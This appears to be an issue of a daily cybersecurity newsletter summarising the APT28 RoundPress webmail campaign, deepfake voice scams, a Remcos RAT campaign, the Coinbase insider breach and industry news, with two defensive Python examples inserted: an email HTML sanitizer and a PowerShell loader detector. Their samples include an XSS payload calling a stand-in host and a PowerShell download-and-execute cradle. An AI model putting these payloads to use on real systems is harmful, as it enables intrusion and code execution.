Cyber Briefing: 2025.05.16
APT28 hits webmail, AI voice scams surge, and Remcos RAT spreads via LNKs. Coinbase insider breach, Swiss plant phished, Brazil pharma hit. CISA renewal, $230M crypto bust, Proofpoint acquires Hornet.
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
👉 What are the latest cybersecurity alerts, incidents, and news?
🚨 Cyber Alerts
1. APT28 RoundPress Webmail Hack Steals Emails
Suspected Russian state-sponsored hackers, identified as APT28, are conducting a global cyberespionage campaign dubbed 'RoundPress'. This operation targets high-value government organizations across the globe by exploiting flaws in widely used webmail servers. Attackers initiate contact through spear-phishing emails containing malicious JavaScript, which allows them to steal credentials and data merely when an email is opened. The campaign has successfully leveraged multiple cross-site scripting (XSS) vulnerabilities, including zero-days, in webmail products such as Roundcube, MDaemon, and Zimbra.
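The RoundPress item above comes down to one defensive control: a webmail client must never render script, event handlers or script-scheme links from an inbound message body. The following allow-list sanitizer is an added example written for this briefing, not code from any of the webmail products named; the tag and attribute allow-lists are assumptions a real deployment would tune, and the sample message is constructed.

```python
"""Allow-list HTML sanitizer for inbound webmail bodies (added example).

Strategy: drop <script>/<style>/<iframe> content entirely, keep only known-safe
tags, strip every on* event handler, and refuse href values whose scheme is not
http/https/mailto after whitespace/control characters are removed (browsers
tolerate "java\tscript:", so the check must normalise first).
"""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "a", "ul", "ol", "li",
                "div", "span", "table", "tr", "td", "th", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}, "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
_CONTROL_WS = re.compile(r"[\x00-\x20]")


def safe_url(value: str) -> bool:
    """Accept only http(s)/mailto links after removing control chars and spaces."""
    normalised = _CONTROL_WS.sub("", value or "").lower()
    return normalised.startswith(SAFE_SCHEMES)


class EmailSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.skip_depth = 0  # >0 while inside <script>/<style>/... content

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped, its text content is kept
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):          # onclick, onerror, onload, ...
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        # <br/> and friends: emit a single void tag, no closing tag
        if tag in VOID_TAGS and not self.skip_depth:
            self.out.append(f"<{tag}>")
        else:
            self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))  # re-escape so text can never become markup


def sanitize_html(body: str) -> str:
    """Return a sanitized copy of an HTML email body."""
    s = EmailSanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out)


# Constructed sample message exercising each bypass class the sanitizer handles.
SAMPLE_MESSAGE = (
    '<p onclick="alert(1)">Hi <script>fetch("//evil.invalid")</script>'
    '<a href="java&#9;script:alert(1)">x</a>'
    '<a href="https://example.invalid/doc">ok</a>'
    '<img src=x onerror=alert(1)> &lt;b&gt;</p>'
)

if __name__ == "__main__":
    print(sanitize_html(SAMPLE_MESSAGE))
```

The interesting case is the `href` with an entity-encoded tab: the parser decodes `&#9;` to a real tab, so a naive `startswith("javascript:")` check would pass it while a browser would still execute it. Normalising before the scheme check closes that gap; a production webmail should still rely on a maintained sanitizer library rather than a hand-rolled one, and on a Content-Security-Policy that forbids inline script as a second layer.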
2. FBI Warns of AI Voice Phishing Scams
The FBI has issued a warning that cybercriminals are now using AI-generated voice deepfakes in phishing campaigns targeting current and former U.S. government officials. These attacks, which began in April 2025, combine voice phishing (vishing) and text messaging (smishing) to impersonate senior officials and manipulate victims into revealing sensitive information or transferring funds. The agency urges the public to treat unsolicited messages from officials with skepticism, as the threat of AI-enhanced deception grows across multiple sectors.
3. Fileless Remcos RAT Delivery Via LNK Files
Researchers have detailed a new Remcos RAT campaign that uses PowerShell loaders and LNK files for fileless deployment. This remote access trojan enables full system control for espionage, operating stealthily in memory to avoid detection. Other threats include a new .NET malware loader and various phishing campaigns delivering info-stealers and RATs. The rise of AI-powered polymorphic attacks further complicates defense, bypassing traditional security measures effectively.
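A fileless loader that starts from a shortcut file leaves a recognisable trace in process-creation telemetry: PowerShell spawned by explorer.exe with a hidden window, an execution-policy bypass, an encoded command, and an in-memory download-and-execute cradle. The detection below is an added example for this briefing, not from the cited research; the event field names follow a Sysmon Event ID 1 style record but are assumptions, and the events themselves are constructed.

```python
"""Triage of constructed process-creation events for PowerShell loader tradecraft (added example).

Each event is a dict with parent_image, image and command_line (assumed field names).
Two or more independent indicators are required before an event is flagged, so an
interactive PowerShell window opened from Explorer alone does not alert.
"""
import base64
import re
from typing import Dict, List, Optional

# Switch spellings PowerShell accepts (abbreviations included).
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
EXEC_POLICY = re.compile(r"-ex(?:ecutionpolicy)?\s+bypass|-ep\s+bypass", re.I)
ENCODED_CMD = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
IN_MEMORY = re.compile(
    r"downloadstring|downloaddata|invoke-expression|\biex\b|frombase64string|reflection\.assembly",
    re.I,
)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script passed via -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_CMD.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(ev: Dict[str, str]) -> Dict[str, object]:
    image = ev["image"].lower()
    parent = ev["parent_image"].lower()
    cmd = ev["command_line"]
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"suspicious": False, "findings": [], "decoded": None}

    findings: List[str] = []
    if parent.endswith("explorer.exe"):
        findings.append("powershell spawned by explorer.exe (consistent with a double-clicked LNK)")
    if HIDDEN_WINDOW.search(cmd):
        findings.append("hidden window")
    if EXEC_POLICY.search(cmd):
        findings.append("execution policy bypass")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded command")
    # Inspect the decoded script when there is one, otherwise the raw command line.
    if IN_MEMORY.search(decoded if decoded is not None else cmd):
        findings.append("in-memory download/execute pattern")
    return {"suspicious": len(findings) >= 2, "findings": findings, "decoded": decoded}


def triage(events: List[Dict[str, str]]) -> List[int]:
    """Return the indexes of events that should be escalated."""
    return [i for i, ev in enumerate(events) if analyse_event(ev)["suspicious"]]


# Constructed sample events. The payload string is built at runtime purely so the
# decoder has something to decode; the host name is a reserved .invalid domain.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://loader.example.invalid/stage.txt')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": f"powershell.exe -w hidden -ep bypass -enc {_ENCODED}"},
    {"parent_image": r"C:\Windows\System32\svchost.exe", "image": _PS,
     "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe"},
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, analyse_event(SAMPLE_EVENTS[i]))
```

Decoding the `-EncodedCommand` argument before pattern-matching is the step analysts most often skip; the raw command line of the first sample event contains no readable cradle at all, and only the decoded UTF-16LE script reveals the download-and-execute behaviour that marks an in-memory loader.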
💥 Cyber Incidents
4. Coinbase Insider Attack Exposed User Data
Coinbase confirmed that unknown attackers bribed support agents to steal account data from a small group of users. The stolen information included names, masked bank details, government ID images, and transaction histories. Although no funds or passwords were directly exposed, the attackers attempted to extort $20 million by claiming they had internal company data. Coinbase has fired the compromised agents, reimbursed affected users, added stricter ID checks, and offered a $20 million reward for information that leads to the attackers’ arrest and conviction.
5. Hackers Target Swiss Reserve Power Plant
Hackers successfully accessed the email account of a manager at the Birr reserve power plant in Switzerland. They sent phishing emails to Swiss suppliers and business partners, attempting to trick recipients into clicking malicious links. Swiss authorities, including the Federal Office of Energy, confirmed the attack but stated the plant’s core systems remained secure. This incident highlights vulnerabilities in critical infrastructure, and new Swiss laws now require prompt reporting of such cyberattacks to improve national cybersecurity defenses.
6. Cyberattack Hits J Batista Group
Brazilian pharmaceutical firms Nazária and Drogarias Globo, part of the Jorge Batista group, suffered a cyberattack. The attack caused system instabilities, prompting them to reinforce security and work on service normalization. While details are limited and the parent group is silent, a separate incident hit Brazil's IPEN. This earlier IPEN attack halted radiopharmaceutical production, highlighting wider sector risks in Brazil.
📢 Cyber News
7. Lawmakers Urge Cyber Bill Renewal Soon
Lawmakers on the House Homeland Security Committee’s Cybersecurity Subcommittee are urging swift reauthorization of the Cybersecurity Information Sharing Act (CISA 2015), which is set to expire on September 30. The law has been key in enabling threat intelligence exchanges between government agencies and private industry, helping defend national security against cyber threats. While officials like DHS Secretary Kristi Noem support the renewal, some lawmakers express concern that privacy issues could stall progress, even though no violations have been reported since the law’s passage.
8. US Charges 12 More in $230M Crypto Theft
US authorities charged twelve more suspects in a major RICO conspiracy involving over $230M in crypto theft. The group allegedly used spoofed numbers and impersonation to trick victims into revealing access credentials. Facing charges including racketeering and money laundering, the defendants allegedly laundered funds through various crypto services. The stolen cryptocurrency was then used to finance extravagant lifestyles and luxury purchases by the group.
9. Proofpoint to Acquire Hornetsecurity
Proofpoint announced plans to acquire Hornetsecurity, a major Microsoft 365 security solutions provider. The deal strengthens Proofpoint’s global presence and supports its focus on small and mid-sized businesses. Hornetsecurity offers AI-powered cloud security and compliance services through over 12,000 partners worldwide. The acquisition, valued at $1 billion, is expected to close in the second half of 2025.
📈 Cyber Stocks
💡 Cyber Tip
Watch Out for Fake Voice Calls Claiming to Be from U.S. Officials
The FBI warns that cybercriminals are using AI-generated voice deepfakes and text messages to impersonate senior U.S. officials. These scams trick people into revealing sensitive info or sending money.
✅ What you should do:
Be skeptical of unexpected voice calls or texts from officials or executives, especially if they ask for urgent action.
Don’t click on links or share personal information unless you verify the sender through a trusted contact method.
If something feels off, even if the voice sounds real, hang up and confirm through official channels.
Stay alert to smishing (fraudulent texts) and vishing (voice phishing) tactics that build trust before launching a scam.
Why this matters: AI deepfakes make scams sound more convincing than ever, and even high-level professionals are being targeted.
📚 Cyber Book
Cybersecurity for Seniors Made Easy: Simple Steps to Protect Your Identity, Avoid Money Scams, and Enjoy Peace of Mind Every Time You Go Online by Alex East, Sathammai Somasundaram, and Dr Pablo Breuer
That’s a wrap on today’s threats. Stay sharp, patch often, and see you again on Monday’s briefing.
Copyright © 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on:
Substack, LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.